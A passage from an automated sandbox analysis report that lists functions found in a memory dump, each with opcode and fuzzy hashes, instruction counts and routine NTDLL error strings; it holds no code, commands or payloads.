                                  • Instruction Fuzzy Hash: 9A11E6343046869BE7254E1D8CD07F677D5EB85328F2445AAEB65CB392D770DA40C348
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01948DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  Strings
                                  • Critical error detected %lx, xrefs: 01948E21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Critical error detected %lx
                                  • API String ID: 0-802127002
                                  • Opcode ID: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                                  • Instruction ID: b42f070ff4e1db67269cff90b9d78584fcba59adaaee2f017ce7af9a913c20b0
                                  • Opcode Fuzzy Hash: 4a1a13dfd193d1f70d7383fe6edabcf369d07fd5377357fe30ba7320ba2d69d1
                                  • Instruction Fuzzy Hash: 71117571D04348EBDF24EFE88509BADBBB4AB05711F24421EE52CAB282C3345606CF14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0192FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  Strings
                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0192FF60
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                  • API String ID: 0-1911121157
                                  • Opcode ID: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                                  • Instruction ID: 005ba546abf523da495e4ba0bdf3a2475e2f76e94429b83c5d0d07ce755fe3a9
                                  • Opcode Fuzzy Hash: ab0d52a26dac6d310397df8aeba0664abf36052be808018bacaf27112d1b15d2
                                  • Instruction Fuzzy Hash: 9C110471910154EFEB22EF58C948FD8BBB1FF09705F158044E5089B265C7389A44CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01965BA5, Relevance: .6, Instructions: 592COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81aeb595251e2fe83ab5c3c103b15c34ff4398e0b1aee2a7c2e8eb23072ee33a
                                  • Instruction ID: c985f1b2a856adc6ddd839d63fbc431a7de9c44dff43b752dff91faa52e19e9c
                                  • Opcode Fuzzy Hash: 81aeb595251e2fe83ab5c3c103b15c34ff4398e0b1aee2a7c2e8eb23072ee33a
                                  • Instruction Fuzzy Hash: D8426E75D00229CFEB24CF68C880BA9BBB9FF45305F1581AAD94DEB242D7749985CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018B4120, Relevance: .4, Instructions: 444COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7fb597dcce5f1a5d1a7a520f89e854b393be241f6d960882c5b15bd937552f6
                                  • Instruction ID: 91c31fde95fbe2c159ba283130094ba58a144936b1d8848225251869e5ea331e
                                  • Opcode Fuzzy Hash: b7fb597dcce5f1a5d1a7a520f89e854b393be241f6d960882c5b15bd937552f6
                                  • Instruction Fuzzy Hash: 23F17C706086118FD724CF19C4C1ABABBE1EF88714F15492EF586CB362E734DA95CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C20A0, Relevance: .4, Instructions: 420COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 364454c1ad93720ad79a72d88ba919bc37108584a2cf85771306bee06a5abff7
                                  • Instruction ID: c12a71e52652ff100ddbde62495cee860d58e5f73358423831b490fbdef316a2
                                  • Opcode Fuzzy Hash: 364454c1ad93720ad79a72d88ba919bc37108584a2cf85771306bee06a5abff7
                                  • Instruction Fuzzy Hash: 38F1F4316083419FE726CB2CC44076ABBE7AFC5B24F05851EE999DB2D1D734DA41CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018AD5E0, Relevance: .4, Instructions: 353COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8e92810a3c5c7deb4d555a30b14396f40df0ff2393e1dd4485197bb7f4a6570
                                  • Instruction ID: 4e1323bb3a5b0a1209ecb820d984d677d67a7fa4f84cde65e890995553e5b5b3
                                  • Opcode Fuzzy Hash: e8e92810a3c5c7deb4d555a30b14396f40df0ff2393e1dd4485197bb7f4a6570
                                  • Instruction Fuzzy Hash: 96E1C030A0435ACFFB35CF68C984BA9BBB2BF45304F444299DA09D7691D734AB81CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018A849B, Relevance: .3, Instructions: 290COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 47c1dcdcc6e3ad8819cfa33ed24c0915d563c495ef7737ae592792326df2bb56
                                  • Instruction ID: 07f9e367f116ed228e04ed7b6d5cea0f87c5c5740390724625784638da8e2c2f
                                  • Opcode Fuzzy Hash: 47c1dcdcc6e3ad8819cfa33ed24c0915d563c495ef7737ae592792326df2bb56
                                  • Instruction Fuzzy Hash: 0FB15B70E04209DFEB19DFE9C984AADBBB5BF49308F50412DE605EB345D770AA45CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C513A, Relevance: .3, Instructions: 258COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14460e96fb036e18dbc8695f8a4b72035759115f919509a1c1d1b25072dea2ff
                                  • Instruction ID: 10b81105055641d0fcf347704865b502ac06aade9ce3a2e3b9f0f49bccc6a383
                                  • Opcode Fuzzy Hash: 14460e96fb036e18dbc8695f8a4b72035759115f919509a1c1d1b25072dea2ff
                                  • Instruction Fuzzy Hash: 2EC133756083818FD755CF28C480A5AFBF1BF88704F188A6EF9998B392D771E945CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C03E2, Relevance: .3, Instructions: 254COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afc19ef67eb386a29b5546156a8e917a9dd07108433479cb23bedc264e508764
                                  • Instruction ID: dab589f3ec5799337d064a8589c1eb77bc668d7bdc26dad64ba8aab2907d989a
                                  • Opcode Fuzzy Hash: afc19ef67eb386a29b5546156a8e917a9dd07108433479cb23bedc264e508764
                                  • Instruction Fuzzy Hash: 8E914E35E04259DFEB329B6CC844BAEBBA4AB01B58F050265FB14E72D1D774EE40C781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0189C600, Relevance: .2, Instructions: 225COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a01df7905c54a64a7ecd50feb16af24a63d0cab8eda07b588a6f5cae2a4355f0
                                  • Instruction ID: 8d1d4d8d62a5d3625e3cd6eaf4c5a3164e34b5a462b365699cafddf5dd9e9f03
                                  • Opcode Fuzzy Hash: a01df7905c54a64a7ecd50feb16af24a63d0cab8eda07b588a6f5cae2a4355f0
                                  • Instruction Fuzzy Hash: 4C818275604605CFDB2BCE98C880E7A77E9FB84364F14481AEE999B281D330FD41C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0192B8D0, Relevance: .2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a73ae928e93cd5fbf1a954444ccbf76d855d5d659f4b1c311176f781d656a603
                                  • Instruction ID: 018279ab94c726720f5a89b61be8c4175e745f987b9536ae4b4d2af4e2714d74
                                  • Opcode Fuzzy Hash: a73ae928e93cd5fbf1a954444ccbf76d855d5d659f4b1c311176f781d656a603
                                  • Instruction Fuzzy Hash: 9A712332600716EFEB32DF19C841F66BBF9EF40725F144928E65A8B6A4DB71E940CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01916DC9, Relevance: .2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                  • Instruction ID: 7ed92999b465b1f0e7c4f1e1b592b2a3f736c1bbffe12191c408a3996d137c29
                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                  • Instruction Fuzzy Hash: 47717071E0021AEFDB15DFA8C984EEEBBB9FF88710F104569E509E7250D734AA41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018952A5, Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14eb27871df7049a54b7f427676d03cfdb0346fd323be7850d422cb373bd7678
                                  • Instruction ID: bc856fb53823824a2ab4b503fc58930c6a9548eec5f9127880adaf40ee1adb31
                                  • Opcode Fuzzy Hash: 14eb27871df7049a54b7f427676d03cfdb0346fd323be7850d422cb373bd7678
                                  • Instruction Fuzzy Hash: 4851BC30105342AFD722EFA8C840B2BBBA5FF90714F14091EF599C7692E770EA04CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C2AE4, Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d83fa94882cc7bf1181102c15cc816e35c2342841ec63f87dbc509e5f1dd6d3
                                  • Instruction ID: f1b3d81ce5e2024b92de6f9ceb5e0eb6b45bbd7bc6e360b6f14633ce959d9a3a
                                  • Opcode Fuzzy Hash: 2d83fa94882cc7bf1181102c15cc816e35c2342841ec63f87dbc509e5f1dd6d3
                                  • Instruction Fuzzy Hash: 0B518E76A00129CFCB18DF1CC8909BDB7F2BB88B04719855EE846EB395D630EA51DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0195AE44, Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 988057bc2525cf28677fcbe92f275bee1d474c989b06c59fe973faa83dad2543
                                  • Instruction ID: 1c801e0da25c990b4ee26b85289c8199be2c11869632969f79e64e1283670153
                                  • Opcode Fuzzy Hash: 988057bc2525cf28677fcbe92f275bee1d474c989b06c59fe973faa83dad2543
                                  • Instruction Fuzzy Hash: C541F2B17002119BD766CB2AC894B3BBB9DAFC4621F044719FD1EA72D0DB34E801D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BDBE9, Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb304ec7bc9cfe2495edfa92ff944de1197d4754f4a6f0fc1368539516777696
                                  • Instruction ID: f76a1a8d70681ca44eaa3a5ac9b9efcf0f720e04598586cc7b50007a65d6ddb2
                                  • Opcode Fuzzy Hash: fb304ec7bc9cfe2495edfa92ff944de1197d4754f4a6f0fc1368539516777696
                                  • Instruction Fuzzy Hash: B351B071A01206EFCB15CFACC4D0AAEBBF5BB48318F248259D599E7340DB30AA44CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018AEF40, Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                  • Instruction ID: a286ff161d7f00467cd8f7b90f9f21ad50f4aa1ca1790157c2873ccac02af892
                                  • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                  • Instruction Fuzzy Hash: 8051E130A04249DFFB25CB6CC0D07AEBBB1EF05318F5881A8D645D7282D375AB89C751
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0196740D, Relevance: .1, Instructions: 141COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                  • Instruction ID: cd82a2b71941914f0659f9842c41c3a84cee0d896b2db714b1f9d0e727d79112
                                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                  • Instruction Fuzzy Hash: D551A071500646DFDB1ACF58C580A95BBB9FF45309F15C1AAE908DF212E371EA46CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C2990, Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd44921cf9c053a2442ee208f52684b2e0a44320c62f1cf0f37b9b27020119db
                                  • Instruction ID: 2ebfde857ca71bfc20bb75a09ad23401d25770bbc384c77c36d16d35f9b5b6d2
                                  • Opcode Fuzzy Hash: cd44921cf9c053a2442ee208f52684b2e0a44320c62f1cf0f37b9b27020119db
                                  • Instruction Fuzzy Hash: 56516971A0021ADFDF26DF58C840ADEBBB6BF48B54F058119E905AB290C371DE52CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C4BAD, Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb89c898a0d1d39b9bf0d68a56fd94dc1c45afcb31e838dede181384aa20c6d4
                                  • Instruction ID: a988899b5c67386f34490b675339b0605145f7913d6159dd26c14cf21cc1c88d
                                  • Opcode Fuzzy Hash: cb89c898a0d1d39b9bf0d68a56fd94dc1c45afcb31e838dede181384aa20c6d4
                                  • Instruction Fuzzy Hash: 4E418235A402299FDB21DF6CC940BEE77B8AF55B10F0100A9E908EB291DB74DF84CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C4D3B, Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a12b831f6a3e25e15692eec79a6d9f6fb77989e1e4d77a77c4df028726c3d072
                                  • Instruction ID: 297b09de0f57df05abfa58b6fab77bf778cee1c61d613412f28d1c125d20f905
                                  • Opcode Fuzzy Hash: a12b831f6a3e25e15692eec79a6d9f6fb77989e1e4d77a77c4df028726c3d072
                                  • Instruction Fuzzy Hash: 1C41E671A443189FEB32DF18CC90F6AB7A9EB45B14F05009DE949DB281D774DE80CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018A8A0A, Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 276046b5fd13910e50ee456057617be8f9dfc5154d94375e06d4c20e27024627
                                  • Instruction ID: 30b5c5df0f81cd7bcd745df9f7b07b8a86e96ea2b6e6f5bdd78b2ad8c3f9dbcd
                                  • Opcode Fuzzy Hash: 276046b5fd13910e50ee456057617be8f9dfc5154d94375e06d4c20e27024627
                                  • Instruction Fuzzy Hash: B2418DB0A0022C9BEB24DF19C898BA9B7F4EB95301F5041EAD909D7242E7709F81CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0195AA16, Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                  • Instruction ID: 8fa6cb4d013e4d5c47e8409cd08e0178f7c76928c983960660822d238c830e6b
                                  • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                  • Instruction Fuzzy Hash: 56311332F002056BEB55CB6AC844BAFFBBBEFC0211F054569ED08B7291DA709D00C798
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0195FDE2, Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                  • Instruction ID: 4cfcfbf496c97dbdbdb5e3e6182e921e1e419c681d2324908f826ecf1e8adbad
                                  • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                  • Instruction Fuzzy Hash: 443114322006416FD362DB6CC848F6ABBEEEBC5761F184458ED4EAB742DA74EC41C760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0195EA55, Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction ID: dfab03478aac76d4dba342b180ec0489ba5fd0eade1716d0605459626da66268
                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction Fuzzy Hash: FF31C3326047069BC719DF28C880A5BF7AAFFC0310F04492DF95A97741DE31E905C7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019169A6, Relevance: .1, Instructions: 108COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45017203de26e298b719a07cb4e3bed181481c82ba98de72915451d8c8fd72ab
                                  • Instruction ID: c65b6d66a71e85f16e7d04194fa39475ef89ada183b8ccb3d61a1adcad955263
                                  • Opcode Fuzzy Hash: 45017203de26e298b719a07cb4e3bed181481c82ba98de72915451d8c8fd72ab
                                  • Instruction Fuzzy Hash: DB417CB1D0020DAFDB24DFA9D940BEEBBF8EF48714F14812AE918E7240DB749A45CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01895210, Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bcf6bfa5d18f0e10773c4cd8966b9b4a535bb477450df280704e8521a691c2d9
                                  • Instruction ID: 9a59e2d0d83e1c97853030270301ab0c9e9fd68a7bfd7f3b03d7a9ae185b8e96
                                  • Opcode Fuzzy Hash: bcf6bfa5d18f0e10773c4cd8966b9b4a535bb477450df280704e8521a691c2d9
                                  • Instruction Fuzzy Hash: 193125312417059FCB26AB5CC880F6A7766FF50764F14472EF655CB1D2DB20EB00C691
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D3D43, Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f181e894783d4278493ad76457b9cc55eacdc8d902500ea507759cd9a91efa79
                                  • Instruction ID: 1a5ad8e0a64b49348bdb3e005ebcbd9b9ee3045b0dbbcde64b0a1acaa30b5dc9
                                  • Opcode Fuzzy Hash: f181e894783d4278493ad76457b9cc55eacdc8d902500ea507759cd9a91efa79
                                  • Instruction Fuzzy Hash: 4031BEB1A01715DFD7258F2DC841A6ABBE5FF85700B05846AE949CB790EB30DA40CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018CA61C, Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ddf36aeaad330d64911240b1c484e26bc4d7122535d126efaffa6bee704ad635
                                  • Instruction ID: 1ce5f63a1d1c47ebac958a231edf147a371ccad84fe0ddc5b0c518c738aa7680
                                  • Opcode Fuzzy Hash: ddf36aeaad330d64911240b1c484e26bc4d7122535d126efaffa6bee704ad635
                                  • Instruction Fuzzy Hash: 6E416A75A00209DFDB19CF58C880BADBBF1BB89714F19806DE909EB385E774EA01CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BC182, Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction ID: 6854f0150772eba7ada9348da0e5cbe53bdefbce97b84d011e816fe8381eaaca
                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction Fuzzy Hash: 2A31C072601A4BAEE705EBB8C480BE9FB58BF52304F04815AD51CD7341DB346B49C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01917016, Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e837dd0d4c275e6cbadce5178162f0ddb782aa2a83d1eff9a2209bba57c41fc0
                                  • Instruction ID: ef463ccc67a6aa38309440e1d20965e0a0d2e3cfd38af2cf1fe30fffd4a2e735
                                  • Opcode Fuzzy Hash: e837dd0d4c275e6cbadce5178162f0ddb782aa2a83d1eff9a2209bba57c41fc0
                                  • Instruction Fuzzy Hash: C131E6726087569BC324DF6CC840A6AB7E9BFC8700F044A29F99987794E730E944C7A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01943D40, Relevance: .1, Instructions: 98COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 516000b4c02818d09d1668e412cdd45d70e07ea2bdd4b5e58c22b9e2a9d1792c
                                  • Instruction ID: e4d26bbe381460dd87475b39e712300359aa1c898ba3d8bca4f1f732f3d745e0
                                  • Opcode Fuzzy Hash: 516000b4c02818d09d1668e412cdd45d70e07ea2bdd4b5e58c22b9e2a9d1792c
                                  • Instruction Fuzzy Hash: 55318CB150A312DFCB24DF28D58085ABBE5FF85705F45896EE4989B251D730EA04CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018CA70E, Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19920398f5dbd17acde6ccf82952131425b15dcbd1f06e09498facf42d218b44
                                  • Instruction ID: 865e1e392e7722b7c2819f321b5b1fb89eed65c9ff3b00d93527b2477602b70a
                                  • Opcode Fuzzy Hash: 19920398f5dbd17acde6ccf82952131425b15dcbd1f06e09498facf42d218b44
                                  • Instruction Fuzzy Hash: EC31C4B1604209DFD729CF98D880F697BFAFB85B10F240959E259D7344E770DA01CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018C61A0, Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e2dda8fc6c299023e76638ee67f4ae62f8af3eeb1fece907aa299e9d59ae03c
                                  • Instruction ID: b374890dc58ef568fb0060225c1a7184ed8f9458bd72219f757915fcb25152b9
                                  • Opcode Fuzzy Hash: 3e2dda8fc6c299023e76638ee67f4ae62f8af3eeb1fece907aa299e9d59ae03c
                                  • Instruction Fuzzy Hash: 47317C716057018FE325CF5DC840B26BBE9FB88B10F15496EE999D7391E770E904CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0189AA16, Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 849be5b40bd74deaa9172c59144972b32647bb34b70a6fa3cd3585fe1a4d9dee
                                  • Instruction ID: cc45425e9a353f23b6fca8f65ef3eab8ee1fc2b05c6a96234e79a15140d54800
                                  • Opcode Fuzzy Hash: 849be5b40bd74deaa9172c59144972b32647bb34b70a6fa3cd3585fe1a4d9dee
                                  • Instruction Fuzzy Hash: 7A31C371A0021AABDF159F68CD81ABFB7B9EF14700F05406EF905E7250E7789B11DBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D4A2C, Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f118349e75d5ef80f1e865ac86579465442a30d2da935df0b21033acafd9f0d5
                                  • Instruction ID: 6927a7d1cede0ea7b36809f4d2966ee81a6f73ea98ea8d536711644d67cbd64b
